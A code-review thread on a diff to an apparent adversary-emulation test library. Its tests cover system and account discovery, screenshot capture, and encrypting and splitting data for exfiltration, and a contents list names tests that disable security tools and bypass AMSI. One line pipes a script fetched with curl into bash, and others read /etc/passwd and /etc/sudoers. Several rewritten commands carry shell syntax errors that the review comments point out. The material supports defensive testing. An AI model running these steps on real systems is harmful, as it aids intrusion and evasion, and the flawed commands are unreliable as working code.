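Review bot: The first rewritten line of the macOS/Linux permission-groups command ends `...skipping..."; fi; fi;`, and the second `fi` has no matching `if`, so sh aborts with a syntax error before the `dscl` and `groups` checks are reached. Remove the duplicate: `if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;`. The same stray-`fi` slip appears in the T1083 `Nix File and Directory Discovery 2` hunk earlier in this diff.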
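Review bot: The three new input arguments of the ping-sweep test in the `@@ -19147` hunk all carry the description `Subnet used for ping sweep.`, which is only true of `subnet`; `start_host` and `stop_host` are the first and last host octet handed to `seq`. Suggest `description: First host octet of the sweep range (inclusive).` and `description: Last host octet of the sweep range (inclusive).` respectively. Since `seq` consumes them as numbers, `type: integer` would describe them better than `type: string` if the test schema allows it.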
@@ -19467,14 +19692,21 @@ discovery: supported_platforms: - linux - macos + input_arguments: + output_file: + description: Output file used to store the results. + type: path + default: "/tmp/T1082.txt" executor: name: sh - command: | - uname -a >> /tmp/loot.txt - cat /etc/lsb-release >> /tmp/loot.txt - cat /etc/redhat-release >> /tmp/loot.txt - uptime >> /tmp/loot.txt - cat /etc/issue >> /tmp/loot.txt + command: "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat + /etc/lsb-release >> #{output_file}; fi;\nif [ -f /etc/redhat-release ]; + then cat /etc/redhat-release >> #{output_file}; fi; \nif [ -f /etc/issue + ]; then cat /etc/issue >> #{output_file}; fi;\nuptime >> #{output_file}\ncat + #{output_file} 2>/dev/null\n" + cleanup_command: 'rm #{output_file} 2>/dev/null + +' - name: Linux VM Check via Hardware description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. 
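Review bot: The rewritten `List OS Information` command is emitted as a double-quoted scalar with literal `\n` escapes, unlike every sibling test in this diff that uses a `|` block, which makes the six commands hard to read and review. The cause appears to be the trailing space in `fi; \nif [ -f /etc/issue` — emitters fall back to double quotes when a line ends in whitespace; strip that space in the technique YAML and the block can be written as `command: |` with one command per line. Behavior is unchanged either way.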
@@ -19485,14 +19717,14 @@ discovery: executor: name: bash command: | - cat /sys/class/dmi/id/bios_version | grep -i amazon - cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" - cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU" - sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu" - cat /proc/scsi/scsi | grep -i "vmware\|vbox" - cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual" - sudo lspci | grep -i "vmware\|virtualbox" - sudo lscpu | grep -i "Xen\|KVM\|Microsoft" + if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi; + if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi; + if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi; + if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi; + if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi; + if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi; + if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox" + if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft" - name: Linux VM Check via Kernel Modules description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. @@ -19588,7 +19820,7 @@ discovery: modified: '2019-08-12T19:44:26.156Z' identifier: T1016 atomic_tests: - - name: System Network Configuration Discovery + - name: System Network Configuration Discovery on Windows description: | Identify network configuration information 
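Review bot: The last two rewritten lines of `Linux VM Check via Hardware`, `if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"` and the matching `lscpu` line, are never closed with `; fi;`, so bash reports a syntax error at end of input and those two checks never run (the earlier lines may already have executed by then). Append `; fi;` to both. The third line also guards the wrong file: `if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor ...` should test `/sys/class/dmi/id/chassis_vendor`, otherwise the guard does not protect the `cat` it wraps.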
@@ -19629,9 +19861,10 @@ discovery: name: sh elevation_required: false command: | - arp -a - netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c - ifconfig + if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; + if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi; + if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi; + if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; - name: System Network Configuration Discovery (TrickBot Style) description: | Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ @@ -19796,6 +20029,12 @@ discovery: supported_platforms: - linux - macos + dependency_executor_name: sh + dependencies: + - description: Check if netstat command exists on the machine + prereq_command: if [ -x "$(command -v netstat)" ]; then exit 0; else exit + 1; + get_prereq_command: echo "Install netstat on the machine."; exit 1; executor: name: sh elevation_required: false @@ -28117,10 +28356,15 @@ collection: supported_platforms: - linux - macos + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: Path + default: "/tmp/T1074_discovery.log" executor: name: bash command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh - | bash -s > /tmp/discovery.log + | bash -s > #{output_file} ' - name: Zip a Folder with PowerShell for Staging in Temp 
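Review bot: The new `prereq_command` for T1049, `if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1;`, has no closing `fi`, so `sh` reports a syntax error and the prerequisite check never returns the intended status; it should read `if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;`. The rendered T1018, T1046 and T1087 markdown later in this commit show the same unterminated `if` in their prereq commands, the T1069 markdown has a doubled `fi; fi;`, and the second T1083 test has a stray `cat #{output_file}; fi;`, so their YAML entries (outside this view) appear to need the same correction. Since `get_prereq_command` only echoes an install hint and exits 1, this dependency can be reported but never resolved automatically, which is worth stating in its `description`.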
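Review bot: The new `output_file` argument's `description` says "Location to save downloaded discovery.bat file", but the command fetches `Discovery.sh` and the path only receives that script's stdout via `> #{output_file}`; `description: Path where the output of Discovery.sh is written` matches what the test does. No `cleanup_command` is added here, unlike the T1082 and T1113 entries in the same commit, so `/tmp/T1074_discovery.log` is left behind; `cleanup_command: 'rm -f #{output_file}'` would keep the tests consistent. Not introduced by this change but worth a sentence in the test description: the script is pulled from the `master` branch with no pinned revision or checksum, so what the test executes can change between runs. The test's `name` and `description` lines precede this hunk.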
@@ -28508,12 +28752,15 @@ collection: output_file: description: Output file path type: Path - default: desktop.png + default: "/tmp/T1113_desktop.png" executor: name: bash elevation_required: false command: 'screencapture #{output_file} +' + cleanup_command: 'rm #{output_file} + ' - name: Screencapture (silent) description: 'Use screencapture command to collect a full desktop screenshot @@ -28525,12 +28772,15 @@ collection: output_file: description: Output file path type: Path - default: desktop.png + default: "/tmp/T1113_desktop.png" executor: name: bash elevation_required: false command: 'screencapture -x #{output_file} +' + cleanup_command: 'rm #{output_file} + ' - name: X Windows Capture description: 'Use xwd command to collect a full desktop screenshot and review @@ -28543,12 +28793,15 @@ collection: output_file: description: Output file path type: Path - default: desktop.xwd + default: "/tmp/T1113_desktop.xwd" executor: name: bash command: | xwd -root -out #{output_file} xwud -in #{output_file} + cleanup_command: 'rm #{output_file} + +' - name: Import description: 'Use import command to collect a full desktop screenshot @@ -28559,11 +28812,14 @@ collection: output_file: description: Output file path type: Path - default: desktop.png + default: "/tmp/T1113_desktop.png" executor: name: bash command: 'import -window root #{output_file} +' + cleanup_command: 'rm #{output_file} + ' exfiltration: '': 
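Review bot: Each of the four new `cleanup_command` entries is a bare `rm #{output_file}`; when the capture tool is unavailable or the test fails the file never exists and the cleanup itself errors, so `rm -f #{output_file}` (as the T1087 cleanup in this commit already uses) is the safer form. This applies to all four T1113 hunks here (screencapture, screencapture -x, xwd and import). The xwd hunk's scalar also ends in two newlines (`'rm #{output_file}\n\n'`) where the others have one; a single quoted value such as `cleanup_command: 'rm -f #{output_file}'` avoids the multi-line quoting (the quotes are required, since an unquoted ` #{` would start a YAML comment). Each test's `name` and `description` sit before its hunk.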
@@ -28888,21 +29144,35 @@ exfiltration: supported_platforms: - macos - linux + input_arguments: + test_folder: + description: Path used to store files. + type: Path + default: "/tmp/T1022" + test_file: + description: Temp file used to store encrypted data. + type: Path + default: T1022 + encryption_password: + description: Password used to encrypt data. + type: string + default: InsertPasswordHere + dependency_executor_name: sh + dependencies: + - description: gpg and zip are required to run the test. + prereq_command: if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" + ]; then exit 1; fi; + get_prereq_command: echo "Install gpg and zip to run the test"; exit 1; executor: name: sh elevation_required: false - prereq_command: which gpg command: | - mkdir /tmp/victim-files - cd /tmp/victim-files - touch a b c d e f g - echo "creating zip with password 'insert password here'" - zip --password "insert password here" ./victim-files.zip ./* - echo "encrypting file with gpg, you will need to provide a password" - gpg -c /tmp/victim-files/victim-filex.zip - # - ls -l - cleanup_command: 'rm -Rf /tmp/victim-files + mkdir -p #{test_folder} + cd #{test_folder}; touch a b c d e f g + zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./* + echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip + ls -l #{test_folder} + cleanup_command: 'rm -Rf #{test_folder} ' - name: Compress Data and lock with password for Exfiltration with winrar 
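Review bot: `cd #{test_folder}; touch a b c d e f g` chains with `;`, so if the `cd` fails (unwritable `/tmp`, or a file already at that path) the test carries on in the caller's working directory and the following `zip --password … ./*` archives whatever is there; use `cd #{test_folder} && touch a b c d e f g` or append `|| exit 1` so the remaining steps only run inside the test folder. The same `cd … ;` pattern appears in the T1030 hunk below. The `test_file` description ("Temp file used to store encrypted data") with `type: Path` actually describes a base name to which `zip` appends `.zip` and the gpg step appends `.zip.gpg`; `description: Base name of the archive; .zip and .zip.gpg are appended` would stop users passing a full path that then gets doubled. The test's `name` and `description` lines precede this hunk.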
@@ -29026,14 +29296,33 @@ exfiltration: supported_platforms: - macos - linux + input_arguments: + folder_path: + description: Path where the test creates artifacts + type: Path + default: "/tmp/T1030" + file_name: + description: File name + type: Path + default: T1030_urandom + dependency_executor_name: sh + dependencies: + - description: The file must exist for the test to run. + prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else + exit 0; fi;' + get_prereq_command: "if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; + touch #{folder_path}/safe_to_delete; fi; \ndd if=/dev/urandom of=#{folder_path}/#{file_name} + bs=25000000 count=1" executor: name: sh elevation_required: false command: | - cd /tmp/ - dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 - split -b 5000000 /tmp/victim-whole-file - ls -l + cd #{folder_path}; split -b 5000000 #{file_name} + ls -l #{folder_path} + cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; + fi; + +' T1048: technique: x_mitre_data_sources: diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 5fd7d098..fb09188b 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -6,7 +6,7 @@ Adversaries may use the information from [System Network Configuration Discovery ## Atomic Tests -- [Atomic Test #1 - System Network Configuration Discovery](#atomic-test-1---system-network-configuration-discovery) +- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows) - [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules) @@ -19,7 +19,7 @@ Adversaries may use the information from [System Network Configuration Discovery
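Review bot: The new `cleanup_command` removes `#{folder_path}` only when the `safe_to_delete` marker exists, so when the folder already existed the 25 MB `#{file_name}` written by `get_prereq_command` and the `x??` chunks produced by `split` are left behind with no cleanup at all; give `split` a prefix so the chunks are identifiable, `cd #{folder_path} && split -b 5000000 #{file_name} #{file_name}.`, and add an `else` branch, `else rm -f #{folder_path}/#{file_name}*; fi;`. The `&&` also stops a failed `cd` from running `split` against a relative path in the caller's directory, the same issue as the T1022 hunk above. The dependency `description` ("The file must exist for the test to run.") could state that resolving it writes 25 MB of `/dev/urandom` data into `#{folder_path}`, since that happens at prereq time rather than in the test itself. The test's `name` and `description` precede this hunk.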
-## Atomic Test #1 - System Network Configuration Discovery +## Atomic Test #1 - System Network Configuration Discovery on Windows Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. @@ -90,9 +90,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi ```sh -arp -a -netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c -ifconfig +if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; +if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi; +if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi; +if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; ``` diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 8ddf3733..e48b2e68 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -197,6 +197,18 @@ arp -a | grep -v '^?' +#### Dependencies: Run with `sh`! +##### Description: Check if arp command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install arp on the machine."; exit 1; +``` + +
@@ -212,12 +224,19 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| subnet | Subnet used for ping sweep. | string | 192.168.1| +| start_host | Subnet used for ping sweep. | string | 1| +| stop_host | Subnet used for ping sweep. | string | 254| + #### Attack Commands: Run with `sh`! ```sh -for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done +for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done ``` diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index e43b3c37..133c482f 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md 
@@ -25,29 +25,44 @@ Encrypt data for exiltration +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| test_folder | Path used to store files. | Path | /tmp/T1022| +| test_file | Temp file used to store encrypted data. | Path | T1022| +| encryption_password | Password used to encrypt data. | string | InsertPasswordHere| + #### Attack Commands: Run with `sh`! ```sh -mkdir /tmp/victim-files -cd /tmp/victim-files -touch a b c d e f g -echo "creating zip with password 'insert password here'" -zip --password "insert password here" ./victim-files.zip ./* -echo "encrypting file with gpg, you will need to provide a password" -gpg -c /tmp/victim-files/victim-filex.zip -# -ls -l +mkdir -p #{test_folder} +cd #{test_folder}; touch a b c d e f g +zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./* +echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip +ls -l #{test_folder} ``` #### Cleanup Commands: ```sh -rm -Rf /tmp/victim-files +rm -Rf #{test_folder} ``` +#### Dependencies: Run with `sh`! +##### Description: +##### Check Prereq Commands: +```sh +if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; +``` +##### Get Prereq Commands: +```sh +echo "Install gpg and zip to run the test"; exit 1; +``` + +
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 7e15333b..b8be89a2 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -17,20 +17,41 @@ Take a file/directory, split it into 5Mb chunks +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| folder_path | Path where the test creates artifacts | Path | /tmp/T1030| +| file_name | File name | Path | T1030_urandom| + #### Attack Commands: Run with `sh`! ```sh -cd /tmp/ -dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 -split -b 5000000 /tmp/victim-whole-file -ls -l +cd #{folder_path}; split -b 5000000 #{file_name} +ls -l #{folder_path} +``` + +#### Cleanup Commands: +```sh +if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; +``` + + + +#### Dependencies: Run with `sh`! +##### Description: +##### Check Prereq Commands: +```sh +if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; +``` +##### Get Prereq Commands: +```sh +if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; +dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 ``` - -
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 943bbe3f..fb27e171 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -72,6 +72,18 @@ nc -nv #{host} #{port} +#### Dependencies: Run with `sh`! +##### Description: Check if nmap command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install nmap on the machine to run the test."; exit 1; +``` + +
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 774c30a5..e589cd9f 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -99,6 +99,18 @@ who -a +#### Dependencies: Run with `sh`! +##### Description: Check if netstat command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install netstat on the machine."; exit 1; +``` + +
diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md index 5761eab7..978e1a43 100644 --- a/atomics/T1069/T1069.md +++ b/atomics/T1069/T1069.md @@ -46,9 +46,9 @@ Permission Groups Discovery ```sh -dscacheutil -q group -dscl . -list /Groups -groups +if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi; +if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi; +if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi; ``` diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index 013cd8d4..1967b373 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -57,12 +57,17 @@ Utilize curl to download discovery.sh and execute a basic information gathering +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074_discovery.log| + #### Attack Commands: Run with `bash`! ```bash -curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log +curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > #{output_file} ``` diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 3f757a7c..3e2ead2b 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -71,7 +71,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ## Atomic Test #2 - System Information Discovery Identify System Info -**Supported Platforms:** Linux, macOS +**Supported Platforms:** macOS @@ -81,7 +81,6 @@ Identify System Info ```sh -systemsetup system_profiler ls -al /Applications ``` 
@@ -102,18 +101,28 @@ Identify System Info +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Output file used to store the results. | path | /tmp/T1082.txt| + #### Attack Commands: Run with `sh`! ```sh -uname -a >> /tmp/loot.txt -cat /etc/lsb-release >> /tmp/loot.txt -cat /etc/redhat-release >> /tmp/loot.txt -uptime >> /tmp/loot.txt -cat /etc/issue >> /tmp/loot.txt +uname -a >> #{output_file} +if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi; +if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi; +if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi; +uptime >> #{output_file} +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm #{output_file} 2>/dev/null +``` 
@@ -135,14 +144,14 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot ```bash -cat /sys/class/dmi/id/bios_version | grep -i amazon -cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" -cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU" -sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu" -cat /proc/scsi/scsi | grep -i "vmware\|vbox" -cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual" -sudo lspci | grep -i "vmware\|virtualbox" -sudo lscpu | grep -i "Xen\|KVM\|Microsoft" +if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi; +if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi; +if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi; +if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi; +if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi; +if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi; +if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox" +if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft" ``` diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index a7cd04eb..645eab0b 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md 
@@ -94,20 +94,30 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Output file used to store the results. | path | /tmp/T1083.txt| + #### Attack Commands: Run with `sh`! ```sh -ls -a > allcontents.txt -ls -la /Library/Preferences/ > detailedprefsinfo.txt -file */* *>> ../files.txt +ls -a >> #{output_file} +if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi; +file */* *>> #{output_file} +cat #{output_file} 2>/dev/null find . -type f ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/' locate * which sh ``` +#### Cleanup Commands: +```sh +rm #{output_file} +``` @@ -124,20 +134,30 @@ Find or discover files on the file system +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Output file used to store the results. | path | /tmp/T1083.txt| + #### Attack Commands: Run with `sh`! ```sh -cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt -cat /etc/mtab > /tmp/loot.txt -find . -type f -iname *.pdf > /tmp/loot.txt +cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file} +if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi; +find . -type f -iname *.pdf >> #{output_file} +cat #{output_file}; fi; find . -type f -name ".*" ``` +#### Cleanup Commands: +```sh +rm #{output_file} +``` + -
diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md index 0b1edb1e..00f839ac 100644 --- a/atomics/T1087/T1087.md +++ b/atomics/T1087/T1087.md @@ -62,7 +62,7 @@ Enumerate all accounts by copying /etc/passwd to another file #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| #### Attack Commands: Run with `sh`! @@ -70,8 +70,13 @@ Enumerate all accounts by copying /etc/passwd to another file ```sh cat /etc/passwd > #{output_file} +cat #{output_file} ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` @@ -91,16 +96,21 @@ cat /etc/passwd > #{output_file} #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| -#### Attack Commands: Run with `sh`! +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh cat /etc/sudoers > #{output_file} +cat #{output_file} ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` @@ -120,7 +130,7 @@ View accounts wtih UID 0 #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| #### Attack Commands: Run with `sh`! @@ -128,8 +138,13 @@ View accounts wtih UID 0 ```sh grep 'x:0:' /etc/passwd > #{output_file} +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +``` 
@@ -173,7 +188,7 @@ Show if a user account has ever logged in remotely #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| #### Attack Commands: Run with `sh`! @@ -181,10 +196,27 @@ Show if a user account has ever logged in remotely ```sh lastlog > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```sh +rm -f #{output_file} ``` +#### Dependencies: Run with `sh`! +##### Description: Check if lastlog command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install lastlog on the machine to run the test."; exit 1; +``` + diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md index f629abf8..bf07e8d7 100644 --- a/atomics/T1089/T1089.md +++ b/atomics/T1089/T1089.md 
@@ -12,35 +12,41 @@ - [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux) -- [Atomic Test #5 - Disable Carbon Black Response](#atomic-test-5---disable-carbon-black-response) +- [Atomic Test #5 - Stop Crowdstrike Falcon on Linux](#atomic-test-5---stop-crowdstrike-falcon-on-linux) -- [Atomic Test #6 - Disable LittleSnitch](#atomic-test-6---disable-littlesnitch) +- [Atomic Test #6 - Disable Carbon Black Response](#atomic-test-6---disable-carbon-black-response) -- [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella) +- [Atomic Test #7 - Disable LittleSnitch](#atomic-test-7---disable-littlesnitch) -- [Atomic Test #8 - Unload Sysmon Filter Driver](#atomic-test-8---unload-sysmon-filter-driver) +- [Atomic Test #8 - Disable OpenDNS Umbrella](#atomic-test-8---disable-opendns-umbrella) -- [Atomic Test #9 - Disable Windows IIS HTTP Logging](#atomic-test-9---disable-windows-iis-http-logging) +- [Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS](#atomic-test-9---stop-and-unload-crowdstrike-falcon-on-macos) -- [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon) +- [Atomic Test #10 - Unload Sysmon Filter Driver](#atomic-test-10---unload-sysmon-filter-driver) -- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed) +- [Atomic Test #11 - Disable Windows IIS HTTP Logging](#atomic-test-11---disable-windows-iis-http-logging) -- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key) +- [Atomic Test #12 - Uninstall Sysmon](#atomic-test-12---uninstall-sysmon) -- [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service) +- [Atomic Test #13 - AMSI Bypass - AMSI InitFailed](#atomic-test-13---amsi-bypass---amsi-initfailed) -- [Atomic Test #14 - Tamper with Windows Defender ATP 
